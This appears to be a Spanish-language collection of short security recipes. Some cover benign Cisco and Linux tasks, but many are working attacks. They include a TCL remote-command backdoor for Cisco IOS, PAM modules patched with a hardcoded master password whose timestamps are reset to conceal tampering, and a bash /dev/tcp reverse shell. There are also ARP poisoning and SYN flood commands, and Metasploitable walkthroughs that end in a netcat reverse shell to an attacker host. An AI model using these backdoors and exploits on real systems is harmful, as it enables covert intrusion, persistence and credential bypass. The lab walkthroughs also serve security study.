# IOS backdoor con TCL

Introducción

IOS backdoor
TCL

Ejecución
Router#tclsh
Router(tcl)#proc backdoor {port} {
+> global shell loop
+> set shell [socket -server bdsh $port]
+> vwait loop
+> close $shell
+>}

Router(tcl)#proc bdsh {socket ip port} {
+> fconfigure $socket -buffering line
+> puts -nonewline $socket "#"
+> flush $socket
+> fileevent $socket readable [list echo $socket]
+>}

Router(tcl)#proc echo {socket} {
+> global loop
+> if {![catch {gets $socket command}] && ![eof $socket]} {
+>  switch -exact -- $command {
+>   :exit { return [close $socket] }
+>   :stop { set loop end; return [close $socket] }
+>   default { execute $socket $command }
+>  }
+> }
+>}

Router(tcl)#proc execute {socket command} {
+> catch {eval "exec $command"} output
+> if {[catch {puts $socket $output}]} {
+>  return [close $socket]
+> } else {
+>  puts -nonewline $socket "#"
+>  flush $socket
+> }
+>}

Router(tcl)#backdoor 1234
remote_host# ncat Router 1234
#show run | i hostname
hostname Router
#

# IOS Server Load Balancing (SLB)

Introducción

SLB

Dispatched mode (mac-rewrite)
r7200(config)#ip slb serverfarm telnet_srvfarm
r7200(config-slb-sfarm)#predictor leastconns
r7200(config-slb-sfarm)#real 192.168.1.1
r7200(config-slb-real)#weight 16
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.2
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.3
r7200(config)#ip slb vserver telnet_vserver
r7200(config-slb-vserver)#virtual 192.168.11.254 tcp telnet
r7200(config-slb-vserver)#serverfarm telnet_srvfarm
r7200(config-slb-vserver)#inservice
SRV1#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV2#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.2 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV3#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.3 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
Directed mode (NAT)
r7200(config)#ip slb serverfarm telnet_srvfarm
r7200(config-slb-sfarm)#predictor leastconns
r7200(config-slb-sfarm)#nat server
r7200(config-slb-sfarm)#real 192.168.1.1
r7200(config-slb-real)#weight 16
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.2
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.3
r7200(config)#ip slb vserver telnet_vserver
r7200(config-slb-vserver)#virtual 192.168.11.254 tcp telnet
r7200(config-slb-vserver)#serverfarm telnet_srvfarm
r7200(config-slb-vserver)#inservice
SRV1#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV2#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.2 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV3#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.3 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

# Filtrando con CBAC y ZFW

Introducción

CBAC
ZFW

CBAC (Context-Based Access Control)
Router#show run | i ^interface|^ description|^ ip
interface FastEthernet0/0
 description outside
 ip address 192.168.1.1 255.255.255.0
interface FastEthernet0/1
 description inside
 ip address 192.168.0.1 255.255.255.0
Router#show hosts | i IP                   
external_host             None  (perm, OK)  0   IP    192.168.1.2
internal_host             None  (perm, OK)  0   IP    192.168.0.2
internal_host#ping external_host
!!!!!
Router(config)#access-list 100 deny ip any any
Router(config)#int fa0/0
Router(config-if)#ip access-group 100 in
internal_host#ping external_host
....
Router(config)#ip inspect name allow_icmp icmp
Router(config)#int fa0/0
Router(config-if)#ip inspect allow_icmp out
internal_host#ping external_host
!!!!!
ZFW (Zone-Based Policy Firewall)
Router#show run | i ^interface|^ description|^ ip
interface FastEthernet0/0
 description outside
 ip address 192.168.1.1 255.255.255.0
interface FastEthernet0/1
 description inside
 ip address 192.168.0.1 255.255.255.0
Router#show hosts | i IP                    
external_host             None  (perm, OK)  0   IP    192.168.1.2
internal_host             None  (perm, OK)  0   IP    192.168.0.2
internal_host#ping external_host
!!!!!
Router(config)#zone security outside_zone
Router(config)#zone security inside_zone
Router(config)#int fa0/0
Router(config-if)#zone-member security outside_zone
Router(config-if)#int fa0/1
Router(config-if)#zone-member security inside_zone
internal_host#ping external_host
....
Router(config)#class-map type inspect match-any icmp_map
Router(config-cmap)#match protocol icmp
Router(config)#policy-map type inspect icmp_policy
Router(config-pmap)#class type inspect icmp_map
Router(config-pmap-c)#inspect
Router(config)#zone-pair security inside2outside source inside_zone destination outside_zone
Router(config-sec-zone-pair)#service-policy type inspect icmp_policy
internal_host#ping external_host
!!!!!

# Linux backdoor con pam_ldap.so

Introducción

PAM

Ejecución
# apt-get install dpkg-dev flex libldap2-dev 
# dpkg --search pam_ldap.so
# apt-get source libpam-ldap=`dpkg -s libpam-ldap \
| grep -i version | cut -d' ' -f2`
# midir=`pwd`
# cd libpam-ldap-184/
# tar xvzf pam_ldap-184.tar.gz
# cd pam_ldap-184
# ln -s $midir/pam-1.1.1/libpam/include/security/ /usr/include/security
# sed -i '/^  _connect_anonymously/ a \ \ if (strcmp(password, "micasa") == 0) { rc = PAM_SUCCESS; }' pam_ldap.c
# ./configure
# make
# cd
# timestamp=`ls -l /lib/security/ | grep pam_ldap.so \
> | awk '{print $6$7}' | tr -d '-' | tr -d ':'`
# cp /lib/security/pam_ldap.so .
# cp $midir/libpam-ldap-184/pam_ldap-184/pam_ldap.so /lib/security/.
# touch -t $timestamp /lib/security/pam_ldap.so

# Sockets con bash

Introducción

/dev

Ejecución

Petición http sin esperar respuesta
# echo "get /" > /dev/tcp/www.google.com/80
Petición y respuesta http
# exec 3<>/dev/tcp/www.google.com/80
# echo "get /" >&3
# cat <&3
# exec 3>&-
Enviar una shell inversa desde local a remoto
remoto# nc -v -l 192.168.0.10 1234
local# exec 4<>/dev/tcp/192.168.0.10/1234
local# cat <&4 | while read line; do $line 2>&4 >&4; done
remoto#
>hostname
>local

# Configuración inicial sin reload

Introducción

Para obtener la configuración inicial por defecto en los dispositivos Cisco borramos dos ficheros (nvram:startup-config y flash:vlan.dat) y seguidamente reiniciamos el dispositivo (reload).
Para obtener una configuración equivalente a la inicial pero sin reiniciar el dispositivo (ahorrando el tiempo de espera) podemos seguir el siguiente procedimiento.

Ejecución
#! Lo primero que hacemos después de
#! arrancar el dispositivo
#copy system:running-config flash:initial-config
#! Después configuramos el dispositivo
#! Cuando queramos recuperar la configuración
#! equivalente a la inicial, ejecutamos:
#configure replace flash:initial-config force
#delete /force flash:vlan.dat

# Esteganografía en imágenes jpg

Introducción

Steghide

Ejecución
# apt-get install steghide
# wget -O luna.jpg http://tinyurl.com/6earlrf
# steghide info luna.jpg | grep -i cap
  capacidad: 1,5 KB
# ls -la > listado
# steghide --embed -cf luna.jpg -ef listado
# mv listado listado.orig
# steghide --extract -sf luna.jpg
# diff listado listado.orig
#

# Symmetric encryption from the command-line



OpenSSL

# openssl enc -aes-256-cbc -salt -in msg.txt -out msg.txt.enc
# openssl enc -aes-256-cbc -d -in msg.txt.enc -out msg.txt
# date | openssl enc -aes-256-cbc -salt -out msg.txt.enc
# openssl enc -aes-256-cbc -d -in msg.txt.enc > msg.txt

GnuPG

# gpg --cipher-algo AES256 --symmetric -o msg.txt.enc msg.txt
# gpg --decrypt -o msg.txt msg.txt.enc
# date | gpg --cipher-algo AES256 --symmetric -o msg.txt.enc
# gpg --decrypt msg.txt.enc > msg.txt

Mcrypt

# mcrypt --algorithm rijndael-256 --bare msg.txt
# mcrypt --algorithm rijndael-256 --bare --decrypt msg.txt.nc
# date | mcrypt --algorithm rijndael-256 --bare > msg.txt.nc
# cat msg.txt.nc | mcrypt --algorithm rijndael-256 --bare --decrypt > msg.txt

Ccrypt

# ccrypt --encrypt msg.txt
# ccrypt --decrypt msg.txt.cpt
# date | ccrypt --encrypt > msg.txt.cpt
# cat msg.txt.cpt | ccrypt --decrypt > msg.txt

# Esteganografía en ficheros de texto

Introducción

Snow

Ejecución
# mkdir snow
# cd snow
# wget http://www.darkside.com.au/snow/snow-20091217.tar.gz
# tar xvzf snow-20091217.tar.gz
# cd snow-20091217
# make
# ./snow -S main.c
File has storage capacity of between 5669 and 6275 bits.
Approximately 746 bytes.
# ./snow -C -Q -p "micon" -m "tracking" main.c main_modificado.c
# ./snow -C -p "micon" main_modificado.c
tracking

# Borrar de forma segura

Introducción

Secure-delete

Ejecución
# srm -vz punto_montaje/fichero.pdf # fichero
# sfill -vz punto_montaje/ # espacio libre de un disco
# swapoff /dev/sda5; sswap -vz /dev/sda5; swapon /dev/sda5 # swap
# sdmem -vz # ram

# Linux backdoor con pam_unix.so

Introducción

PAM

Ejecución
# apt-get install dpkg-dev flex
# apt-get source libpam-modules=`dpkg -s libpam-modules \
> | grep -i version | cut -d' ' -f2`
# cd pam-1.1.1/modules/pam_unix/
# sed -i '/\tretval = _unix_verify_password(pamh, name, p, ctrl);/ a \\tif (strcmp(p, \"micasa\") == 0) { retval = PAM_SUCCESS; }' pam_unix_auth.c
# cd ../..
# ./configure
# make
# cd
# timestamp=`ls -l /lib/security/ | grep pam_unix.so | grep -v ^l \
> | awk '{print $6$7}' | tr -d '-' | tr -d ':'`
# cp /lib/security/pam_unix.so .
# cp pam-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib/security/.
# touch -t $timestamp /lib/security/pam_unix.so

# Traceroute con hping3

Introducción

hping3

Ejecución
# hping3 -S -p 22 -n --traceroute --tr-no-rtt --fast 192.168.8.1
HPING server1.network8.local (eth0 192.168.8.1): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=192.168.1.1
hop=2 TTL 0 during transit from ip=192.168.2.1
hop=3 TTL 0 during transit from ip=192.168.3.1
hop=4 TTL 0 during transit from ip=192.168.4.1
hop=5 TTL 0 during transit from ip=192.168.5.1
hop=6 TTL 0 during transit from ip=192.168.6.1
ctrl+z
8: len=50 ip=192.168.8.1 ttl=57 DF id=0 sport=22 flags=SA seq=24 win=5840 rtt=27.7 ms

# Reto contraseñas postgres (md5, salt)

Introducción

En el reto 'networking 3' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos postgres.
Usuario: postgres
Salt: 0e5da2d1
Contraseña: 6fcd671f668c3c8efca3308f6f41bd17

Ejecución
# cat diccionario.txt
hack
tracking
Jixi
wargame
# cat postgres_md5_salt.sh
#!/bin/bash

function hex2ascii {
 printf %s $1 | xxd -r -p
}
function md5 {
 printf %s $1 | md5sum | cut -d ' ' -f1
}

user=$1
salt=`hex2ascii $2`
password_file=$3
captured_password=$4

while read secret
do
 hash_stage_1=`md5 $secret$user`
 #echo $hash_stage_1
 generated_password=`md5 $hash_stage_1$salt`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./postgres_md5_salt.sh postgres 0e5da2d1 \
diccionario.txt \
6fcd671f668c3c8efca3308f6f41bd17
Jixi --> 6fcd671f668c3c8efca3308f6f41bd17

# Reto contraseñas mysql (sha1, salt)

Introducción

En el reto 'networking 2' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos mysql.
Utilizaremos un salt y una contraseña distintos.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Contraseña: d648fcba578670abf1ec93b0dce1b41f681dc71c

Ejecución
# cat diccionario.txt
hack
tracking
wargame
# cat mysql_sha1_salt.sh
#!/bin/bash

function dec2hex {
 printf %x $1
}
function hex2ascii {
 printf %s $1 | xxd -r -p
}
function hex2dec {
 printf %d $1
}
function sha1 {
 printf %s $1 | sha1sum | cut -d ' ' -f1
}
function xor {
 length=$[$1-1]
 string_a=$2
 string_b=$3
 for i in `seq 0 $length`
 do
  a=`hex2dec 0x${string_a:$i:1}`
  b=`hex2dec 0x${string_b:$i:1}`
  xored=$xored`dec2hex $(printf '%d' $[$a^$b])`
 done
 printf %s $xored
}

salt=$1
password_file=$2
captured_password=$3

while read secret
do
 hash_stage_1=`sha1 $secret`
 hash_stage_1_=`hex2ascii $hash_stage_1`
 #echo $hash_stage_1
 hash_stage_2=`sha1 $hash_stage_1_`
 hash_stage_2_=`hex2ascii $hash_stage_2`
 #echo $hash_stage_2
 hash_stage_3=`sha1 $salt$hash_stage_2_`
 #echo $hash_stage_3
 generated_password=`xor 40 $hash_stage_1 $hash_stage_3`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./mysql_sha1_salt.sh x8MXV%QLgDZ{ypGN6^Y# \
diccionario.txt \
d648fcba578670abf1ec93b0dce1b41f681dc71c
tracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c

# Mausezahn (interactive mode)

Introducción

Mausezahn

Instalación
# cd
# mkdir mz
# cd mz
# wget http://www.perihel.at/sec/mz/mz-0.40.tar.gz
# tar xvzf mz-0.40.tar.gz
# cd mz-0.40
# apt-get install cmake
# apt-get install libpcap0.8-dev
# apt-get install libnet1-dev
# apt-get install libcli-dev
# cmake .
# make
Ejecución
# cd src/
# ./mz -x 1234
# telnet localhost 1234
Escape character is '^]'.

Username: mz
Password: mz

mz-0.40> en
Password: mops
mz-0.40# show ?
mz-0.40# conf t
mz-0.40(config)# packet
mz-0.40(config-pkt-2)# ?
mz-0.40(config-pkt-2)# name prueba
mz-0.40(config-pkt-2)# desc Esto es una prueba
mz-0.40(config-pkt-2)# ip address source 192.168.1.110
mz-0.40(config-pkt-2)# ip address destination 192.168.1.1
mz-0.40(config-pkt-2)# port destination 80
mz-0.40(config-pkt-2)# tag ?
mz-0.40(config-pkt-2)# interval ?
mz-0.40(config-pkt-2)# count ?
mz-0.40(config-pkt-2)# count 1
mz-0.40(config-pkt-2)# delay ?
mz-0.40(config-pkt-2)# type ?
mz-0.40(config-pkt-2)# type tcp
mz-0.40(config-pkt-2-tcp)# flags syn
mz-0.40(config-pkt-2-tcp)# end
mz-0.40(config-pkt-2)# payload ascii Envío de un syn tcp
mz-0.40(config-pkt-2)# end
mz-0.40(config)# exit
mz-0.40# show packet 2
mz-0.40# run id 2
mz-0.40# launch ?
mz-0.40# launch bpdu
mz-0.40# stop 3
mz-0.40# launch synflood 192.168.1.1
mz-0.40# stop all
mz-0.40# exit
# cat > f.mops << eof
> conf t
> packet
> count 1
> payload hex 64:68:0c:ab:5f:f3:aa:00 04:00:0a:04:08:00:45:00 00:3c:2d:00:00:00:ff:06 0a:fc:c0:a8:01:6e:c0:a8 01:01:00:00:00:50:ca:fe ba:be:00:00:00:00:50:02 00:64:23:43:00:00:45:6e 76:c3:ad:6f:20:64:65:20 75:6e:20:73:79:6e:20:74 63:70
> eof
# telnet localhost 1234
mz-0.40# load ./f.mops
mz-0.40# run id 5

# Mausezahn (direct mode)

Introducción

Mausezahn

Instalación
# apt-get install mz
Tipos de paquetes
# mz -t help

|  The following packet types are currently implemented:
|
|  arp            ... sends ARP packets
|  bpdu           ... sends BPDU packets (STP)
|  cdp            ... sends CDP messages
|  ip             ... sends IPv4 packets
|  udp            ... sends UDP datagrams
|  tcp            ... sends TCP segments
|  icmp           ... sends ICMP messages
|  dns            ... sends DNS messages
|  rtp            ... sends RTP datagrams
|  syslog         ... sends Syslog messages

# mz eth0 -t ip -P "hola mundo" # payload ascii
# mz eth0 -t ip "p=68:6f:6c:61:20:6d:75:6e:64:6f,ttl=1" # payload hexadecimal
Repetición y retardo
# Infinitos paquetes
# mz eth0 -c 0 -t dns "q=www.perihel.at" -B 8.8.8.8
# 100 paquetes, uno cada 2 segundos
# mz eth0 -c 100 -d 2s -t dns "q=www.perihel.at" -B 8.8.8.8
Direcciones de origen y destino
# @mac origen y destino
# mz eth0 -t arp "request,targetip=192.168.1.100" \
-a own -b ff:ff:ff:ff:ff:ff
# @ip origen y destino
# mz eth0 -t dns "q=www.perihel.at" -A rand -B 8.8.8.8
Tramas raw de nivel 2
# mz eth0 -c 0 -a rand -b bcast -p 1000 "08:00-ca-fe-03:e8"
Trama arp
# Envenenamiento de la cache arp
# mz eth0 -t arp "reply,sip=192.168.1.1,\
tmac=aa:00:04:00:0a:04,tip=192.168.1.50"
Trama bpdu
# Anunciamiento como puente raíz de la vlan 1
# mz eth0 -t bpdu "pri=0,vlan=1"
Trama cdp
# Llena la base de datos del dispositivo vecino con tlv_id aleatorios
# mz eth0 -c 0 -a rand -t cdp change
Trama 802.1q
# Vlan=500 y CoS=7
# mz eth0 -Q 7:500 -t icmp ping
# Vlan_externa=100 y vlan_interna=200
# mz eth0 -Q 100,200 -t icmp ping
Trama mpls
# Etiqueta_externa=200 y etiqueta_interna=100
# mz eth0 -M 100,200 -t icmp ping
Paquete ip
# Con paquete raw icmp
# mz eth0 -t ip "dscp=46,ttl=1,proto=1,\
p=08:00-8b:86-de:ad-be:af-68:6f:6c:61:20:6d:75:6e:64:6f"
Segmento udp
# Con paquete raw dns
mz eth0 -t udp "dp=53,p=c5:2f-01:00-00:01-00:00-00:00-00:00-\
03:77:77:77:07:70:65:72:69:68:65:6c:02:61:74:00-00:01-00:01"
Segmento tcp
# Inundación tcp syn al puerto 80
# mz eth0 -A rand -B 192.168.1.50 -t tcp "sp=7,dp=80,flags=syn" -P "DoS test"
# Finaliza la sesión tcp repitiendo el último nseq entre A y B
# mz eth0 -A 192.168.1.50 -B 192.168.1.1 -t tcp "sp=36772,dp=23,flags=rst,s=1090420293"
Protocolo rtp
# Medición del jitter, perdida de paquetes y reordenación
# mz lo -T rtp id=12:34:56:78 # servidor
# mz eth0 -B 192.168.1.50 -t rtp id=12:34:56:78 # cliente
Protocolo syslog
# Envío de mensaje falsificando la @ip de origen
# mz -A 192.168.1.50 -B 192.168.1.1 -t syslog sev=0 
\ -P "Mensaje enviado al servidor syslog"

# Autopwn

Introducción

Autopwn

Ejecución
# svn update /opt/metasploit3/msf3/
# msfconsole
msf > db_nmap -PN -sS -sV 192.168.1.50

Interesting ports on 192.168.1.50:
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
msf > db_autopwn -t -p -e
Active sessions
===============

  Id  Type       Connection                                Via
  --  ----       ----------                                ---
  1   shell php  192.168.1.100:40803 -> 192.168.1.50:5452  exploit/unix/webapp/tikiwiki_graph_formula_exec


msf > session -i 1
msf > db_autopwn -t -x -e
Active sessions
===============

  Id  Type       Connection                                 Via
  --  ----       ----------                                 ---
  2   shell php  192.168.1.100:39008 -> 192.168.1.50:12186  exploit/unix/webapp/tikiwiki_graph_formula_exec

msf > session -i 2

# Nmap

Introducción

Nmap

Normal (tcp syn)
# nmap 192.168.0.1
Varios objetivos
# nmap 192.168.0.1 192.168.0.2
# nmap 192.168.0.1-10
# nmap 192.168.0.0/24
# cat > objetivos.txt << eof
> 192.168.0.11
> 192.168.0.51
> 192.168.0.101
> eof
# nmap -iL objetivos.txt
# nmap 192.168.0.0/24 --exclude 192.168.0.10-100
# nmap 192.168.0.0/24 --excludefile objetivos.txt
Descubrimiento
# nmap -PN 192.168.0.1 # no hagas ping
# nmap -PS 192.168.0.1 # ping tcp syn
# nmap -PA 192.168.0.1 # ping tcp ack
# nmap -PU 192.168.0.1 # ping udp
# nmap -PY 192.168.0.1 # ping sctp init
# nmap -PE 192.168.0.1 # ping icmp echo
# nmap -PP 192.168.0.1 # ping icmp timestamp
# nmap -PM 192.168.0.1 # ping icmp address mask
# nmap -PO 192.168.0.1 # ping protocolo ip
# nmap -PP 192.168.0.1 # ping arp
# nmap ---traceroute 192.168.0.1 # traceroute
Escaneo
# nmap -sP 192.168.0.1 # solo ping
# nmap -sS 192.168.0.1 # tcp syn
# nmap -sT 192.168.0.1 # tcp connect (three-way-handshake)
# nmap -sU 192.168.0.1 # udp
# nmap -sN 192.168.0.1 # tcp null
# nmap -sF 192.168.0.1 # tcp fin
# nmap -sA 192.168.0.1 # tcp ack
# nmap -sX 192.168.0.1 # tcp christmas tree (fin + push + urg)
# nmap --scanflags URGACKPSHRSTSYNFIN 192.168.0.1 # tcp a medida
# nmap -F 192.168.0.1 # escaneo rápido (los 100 puertos más conocidos)
# nmap --top-ports 10 192.168.0.1 # los 10 puertos más conocidos
# nmap -p http,https 192.168.0.1 # nombre de puertos
# nmap -p 1-80 192.168.0.1 # rango de puertos
# nmap -p U:1-50,T:51-100 192.168.0.1 # rango de puertos por protocolo
# nmap -p "*" -r 192.168.0.1 # todos los puertos secuencialmente
Detección
# nmap -O 192.168.0.1 # sistema operativo
# nmap -sV 192.168.0.1 # versión de los servicios
Evasión
# nmap -f 192.168.0.1 # fragmentar en paquetes ip de 8 bytes
# nmap --mtu 16 192.168.0.1 # fragmentar en paquetes ip de 16 bytes
# nmap -D RND:5 192.168.0.1 # genera 5 @ip aleatorias (señuelos)
# nmap -sI 192.168.0.10 192.168.0.1 # escaneo utilizando un zombie
# nmap --source-port 80 192.168.0.1 # puerto de origen 80
# nmap --data-length 40 bytes 192.168.0.1 # añade 40 bytes
# nmap --spoof-mac 0 192.168.0.1 # utiliza una @mac de origen aleatoria
Formato de salida
# nmap -oN ft.txt 192.168.0.1 # fichero de texto
# nmap -oX fx.xml 192.168.0.1 # fichero xml

# Flujos alternativos de datos (ADS)

Introducción

Alternate Data Streams

Ejecución
>mkdir ADS
>cd ADS
>echo "Información visible" > f.txt
>echo "Información oculta" > f.txt:s1.txt
>more < f.txt
"Información visible"

>more < f.txt:s1.txt
"Información oculta"

>notepad f.txt:s1.txt
>type %systemroot%\system32\calc.exe > f.txt:s2.exe
>start .\f.txt:s2.exe
>type %systemroot%\media\tada.wav > ..\ADS:tada.wav
>start ..\ADS:tada.wav

# Metasploitable (samba)

Introducción

Samba: Remote Command Injection Vulnerability

Ejecución
# msfconsole
msf > nmap -sV -O -p 100-500 192.168.1.50
[*] exec: nmap -sV -O -p 100-500 192.168.1.50

Not shown: 399 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop

msf > search samba
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > set rhost 192.168.1.50
msf exploit(usermap_script) > set rport 445
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > set lhost 192.168.1.100
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fXQUYEFiaAED6rM4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "fXQUYEFiaAED6rM4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.50:58167)
uname -a
Linux metasploitable 2.6.24-16-server i686 GNU/Linux
whoami
root

# Metasploitable (postgres + openssl)

Introducción

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

Ejecución
# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
create table sshkey (input text);
copy sshkey from '/root/.ssh/authorized_keys';
select * from sshkey;
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 fila)
# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.50
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root

# Metasploitable (distccd + udev)

Introducción

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

Ejecución
# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn 
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby
# nc -vl 1234
msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)

uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1
# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
